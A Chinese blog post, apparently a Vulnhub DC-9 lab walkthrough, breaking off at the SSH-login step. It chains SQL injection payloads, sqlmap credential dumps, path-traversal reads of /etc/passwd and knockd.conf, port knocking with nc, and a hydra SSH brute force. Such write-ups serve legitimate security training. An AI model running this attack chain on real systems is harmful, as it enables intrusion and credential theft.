{"id":438,"date":"2024-03-21T21:17:41","date_gmt":"2024-03-21T13:17:41","guid":{"rendered":"http:\/\/162.14.82.114\/?p=438"},"modified":"2024-03-21T21:17:41","modified_gmt":"2024-03-21T13:17:41","slug":"vulnhub-dc-9","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/438\/03\/21\/2024\/","title":{"rendered":"Vulnhub&#8211;DC-9"},"content":{"rendered":"<h1>DC-9<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116467.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116467.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321163232789\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116469.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116469.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321163316009\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u6253\u5f00\u626b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116470.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116470.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321165732705\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\uff0cnmap\u626b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116471.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116471.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321165827440\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116472.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116472.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321165818801\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u6765\u662f\u6ca1\u95ee\u9898\u4e86\uff0c\u53ef\u4ee5\u5f00\u59cb\u653b\u51fb\u4e86\uff01<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nmap -sT -T4 -sV 10.160.58.244<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE VERSION\n80\/tcp open  http    Apache httpd 2.4.38 ((Debian))<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/10.160.58.244 -f -t 50 -x php,txt,html,jpg,png<\/code><\/pre>\n<pre><code class=\"language-txt\">\/.php\/                (Status: 403) [Size: 278]\n\/search.php\/          (Status: 200) [Size: 1091]\n\/icons\/               (Status: 403) [Size: 278]\n\/welcome.php\/         (Status: 302) [Size: 0] [--&gt; manage.php]\n\/results.php\/         (Status: 200) [Size: 1056]\n\/display.php\/         (Status: 200) [Size: 2961]\n\/css\/                 (Status: 200) [Size: 932]\n\/index.php\/           (Status: 200) [Size: 917]\n\/includes\/            (Status: 200) [Size: 746]\n\/.html\/               (Status: 403) [Size: 278]\n\/logout.php\/          (Status: 302) [Size: 0] [--&gt; manage.php]\n\/config.php\/          (Status: 200) [Size: 0]\n\/manage.php\/          (Status: 200) [Size: 1210]\n\/session.php\/         (Status: 302) [Size: 0] [--&gt; manage.php]\n\/.php\/                (Status: 403) [Size: 278]\n\/.html\/               (Status: 403) [Size: 278]\n\/server-status\/       (Status: 403) [Size: 278]<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>\u654f\u611f\u76ee\u5f55\u63a2\u67e5<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116473.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116473.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321172644171\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116474.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116474.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321172957301\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116475.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116475.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321173026118\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116476.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116476.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321173107773\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u7528\u6237\u540d<code>admin<\/code>\uff0c\u5237\u65b0\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116477.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116477.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321174512957\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u5c1d\u8bd5sql\u6ce8\u5165<\/h3>\n<pre><code class=\"language-bash\">1&#039; or &#039;1&#039; = &#039;1<\/code><\/pre>\n<p>\u6709\u56de\u663e\uff0c<\/p>\n<pre><code class=\"language-sql\">1&#039; or &#039;1&#039; = &#039;2<\/code><\/pre>\n<p>\u65e0\u56de\u663e\uff0c\u8bf4\u660esql\u6ce8\u5165\u6f0f\u6d1e\u5b58\u5728\uff0c\u5c1d\u8bd5\u8054\u5408\u6ce8\u5165\uff1a<\/p>\n<pre><code class=\"language-sql\">-1&#039; union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() #<\/code><\/pre>\n<p>\u672a\u679c\uff0c\u7ee7\u7eed\u8bd5\u63a2\uff0c\u6ca1\u6210\u529f\uff0c<code>sqlmap<\/code>\u68ad\u4e00\u4e0b\uff0c\u770b\u770b\u662f\u548b\u6ce8\u5165\u7684\u3002 <\/p>\n<pre><code class=\"language-text\">POST \/results.php HTTP\/1.1\nHost: 10.160.58.244\nContent-Length: 10\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/10.160.58.244\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/10.160.58.244\/search.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\nsearch=ctf<\/code><\/pre>\n<p>\u4fdd\u5b58\u4e3a <code>1.txt<\/code>\uff0c\u767b\u5f55\u90a3\u4e2a\u754c\u9762\u4fdd\u5b58\u4e3a <code>2.txt<\/code>\uff0c\u5206\u522b\u6d4b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">POST \/manage.php HTTP\/1.1\nHost: 10.160.58.244\nContent-Length: 32\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/10.160.58.244\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/10.160.58.244\/manage.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: PHPSESSID=dg3l2p0bbh8od1harqv0an2ter\nConnection: close\n\nusername=admin&amp;password=password<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt<\/code><\/pre>\n<p>\u67e5\u5230\u4fe9\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116478.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116478.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321184949089\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">sqlmap -r 2.txt<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116480.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116480.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321185058115\" \/><\/div><\/p>\n<p>\u597d\u5bb6\u4f19\u767b\u5f55\u5012\u662f\u6ca1\u6709\u8dd1\u5230\u6f0f\u6d1e\u3002<\/p>\n<p>\u5c1d\u8bd5\u767b\u5f55\u8fdb\u53bb\u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt --current-db<\/code><\/pre>\n<pre><code class=\"language-sql\">[07:00:43] [INFO] fetching current database\ncurrent database: &#039;Staff&#039;<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt --tables -D &quot;Staff&quot;<\/code><\/pre>\n<pre><code class=\"language-sql\">Database: Staff\n[2 tables]\n+--------------+\n| StaffDetails |\n| Users        |\n+--------------+<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt --columns -T &quot;Users&quot; -D &quot;Staff&quot;<\/code><\/pre>\n<pre><code class=\"language-sql\">Database: Staff\nTable: Users\n[3 columns]\n+----------+-----------------+\n| Column   | Type            |\n+----------+-----------------+\n| Password | varchar(255)    |\n| UserID   | int(6) unsigned |\n| Username | varchar(255)    |\n+----------+-----------------+<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt --dump -C &quot;Password,UserID,Username&quot; -T &quot;Users&quot; -D &quot;Staff&quot;<\/code><\/pre>\n<pre><code class=\"language-sql\">Database: Staff\nTable: Users\n[1 entry]\n+--------+----------+----------------------------------+\n| UserID | Username | Password                         |\n+--------+----------+----------------------------------+\n| 1      | admin    | 856f5de590ef37314e7c3bdf6f8a66dc |\n+--------+----------+----------------------------------+<\/code><\/pre>\n<p>\u5f97\u5230\u7528\u6237\u4e0e\u5bc6\u7801\uff1a<\/p>\n<pre><code class=\"language-apl\">admin \n856f5de590ef37314e7c3bdf6f8a66dc(transorbital1)<\/code><\/pre>\n<p>\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116481.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116481.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321191011749\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u80fd\u5b58\u5728\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u627e\u4e00\u4e0b\u4e0a\u4f20\u70b9\uff1a<\/p>\n<pre><code class=\"language-url\">http:\/\/10.160.58.244\/addrecord.php?file=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116482.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116482.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321191306276\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u5176\u4ed6\u6570\u636e\u5e93\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt --dbs<\/code><\/pre>\n<pre><code class=\"language-sql\">available databases [3]:\n[*] information_schema\n[*] Staff\n[*] users<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt --tables -D &quot;users&quot;<\/code><\/pre>\n<pre><code class=\"language-sql\">Database: users\n[1 table]\n+-------------+\n| UserDetails |\n+-------------+<\/code><\/pre>\n<pre><code>sqlmap -r 1.txt --columns -T &quot;UserDetails&quot; -D &quot;users&quot;<\/code><\/pre>\n<pre><code class=\"language-sql\">Database: users\nTable: UserDetails\n[6 columns]\n+-----------+-----------------+\n| Column    | Type            |\n+-----------+-----------------+\n| firstname | varchar(30)     |\n| id        | int(6) unsigned |\n| lastname  | varchar(30)     |\n| password  | varchar(20)     |\n| reg_date  | timestamp       |\n| username  | varchar(30)     |\n+-----------+-----------------+<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -r 1.txt --dump -C &quot;username,password&quot; -T &quot;UserDetails&quot; -D &quot;users&quot;<\/code><\/pre>\n<pre><code class=\"language-sql\">Database: users\nTable: UserDetails\n[17 entries]\n+-----------+---------------+\n| username  | password      |\n+-----------+---------------+\n| marym     | 3kfs86sfd     |\n| julied    | 468sfdfsd2    |\n| fredf     | 4sfd87sfd1    |\n| barneyr   | RocksOff      |\n| tomc      | TC&amp;TheBoyz    |\n| jerrym    | B8m#48sd      |\n| wilmaf    | Pebbles       |\n| bettyr    | BamBam01      |\n| chandlerb | UrAG0D!       |\n| joeyt     | Passw0rd      |\n| rachelg   | yN72#dsd      |\n| rossg     | ILoveRachel   |\n| monicag   | 3248dsds7s    |\n| phoebeb   | smellycats    |\n| scoots    | YR3BVxxxw87   |\n| janitor   | Ilovepeepee   |\n| janitor2  | Hawaii-Five-0 |\n+-----------+---------------+<\/code><\/pre>\n<h3>ssh\u7206\u7834<\/h3>\n<p>\u5c06\u5176\u653e\u5165\u4e24\u4e2a\u6587\u4ef6\u5185\uff1a<\/p>\n<pre><code class=\"language-apl\">marym\njulied\nfredf\nbarneyr\ntomc\njerrym\nwilmaf\nbettyr\nchandlerb\njoeyt\nrachelg\nrossg\nmonicag\nphoebeb\nscoots\njanitor\njanitor2\n\n3kfs86sfd\n468sfdfsd2\n4sfd87sfd1\nRocksOff\nTC&amp;TheBoyz\nB8m#48sd\nPebbles\nBamBam01\nUrAG0D!\nPassw0rd\nyN72#dsd\nILoveRachel\n3248dsds7s\nsmellycats\nYR3BVxxxw87\nIlovepeepee\nHawaii-Five-0<\/code><\/pre>\n<p>\u4f46\u662f\u6ca1\u5f00\u653e 22 \u7aef\u53e3\uff0c\u8fdc\u7a0b\u76ee\u5f55\u770b\u4e00\u4e0b\u662f\u4e0d\u662f\u5f97knock\u4e00\u4e0b\u624d\u4f1a\u5f00\u653e\uff1a<\/p>\n<pre><code class=\"language-text\">http:\/\/10.160.58.244\/manage.php?file=..\/..\/..\/..\/..\/..\/etc\/knockd.conf<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116483.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116483.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321202517833\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6309\u7167\u987a\u5e8f\u6572\u51fb\u5c31\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">nc 10.160.58.244 7469\nnc 10.160.58.244 8475\nnc 10.160.58.244 9842<\/code><\/pre>\n<p>\u518d\u626b\u63cf\u4e00\u4e0b\u662f\u5426\u5f00\u653e\u4e86 ssh \u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-bash\">nmap 10.160.58.244<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE\n22\/tcp open  ssh\n80\/tcp open  http<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">hydra -L dcusername.txt -P dcpassword.txt ssh:\/\/10.160.58.244<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116484.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116484.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321204536465\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">chandlerb           UrAG0D!\njoeyt               Passw0rd\njanitor             Ilovepeepee<\/code><\/pre>\n<h3>ssh\u767b\u5f55<\/h3>\n<p>\u8fdb\u884c\u767b\u5f55\u67e5\u8be2\u4fe1\u606f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403212116485.png'><img class=\"lazyload lazyload-style-2\" 